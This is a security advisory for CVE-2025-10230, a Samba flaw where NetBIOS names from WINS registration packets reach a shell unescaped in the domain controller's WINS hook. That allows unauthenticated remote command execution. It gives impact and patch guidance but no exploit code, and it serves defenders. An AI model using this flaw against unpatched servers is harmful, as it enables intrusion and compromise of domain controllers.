CVE-2025-10230
Overview
This vulnerability is a command injection flaw rooted in improper input validation and sanitization of NetBIOS names within Samba's WINS front-end hook. Specifically, unsanitized NetBIOS name data from WINS registration packets are directly passed to a shell command executed by the Samba Active Directory Domain Controller’s wins hook component. The lack of escaping or validation of these inputs allows arbitrary command execution within the context of the Samba process.
Vulnerability Description
A flaw was found in Samba, in the front-end WINS hook handling: NetBIOS names from registration packets are passed to a shell without proper validation or escaping. Unsanitized NetBIOS name data from WINS registration packets are inserted into a shell command and executed by the Samba Active Directory Domain Controller’s wins hook, allowing an unauthenticated network attacker to achieve remote command execution as the Samba process.
Impact
An unauthenticated network attacker can exploit this vulnerability to execute arbitrary commands remotely with the privileges of the Samba process. No authentication or user interaction is required to trigger the flaw. Successful exploitation can lead to full compromise of the Samba server, including unauthorized access to sensitive data, lateral movement within the network, and disruption of domain controller operations.
Solution
Apply the security updates provided by Red Hat as detailed in advisory RHSA-2025:10230 and consult the Samba project's security history page for patched versions. Specifically, update Samba to a version that includes the fix for the WINS hook command injection vulnerability. Refer to https://access.redhat.com/security/cve/CVE-2025-10230 and https://www.samba.org/samba/history/security.html for detailed patch instructions and version information.
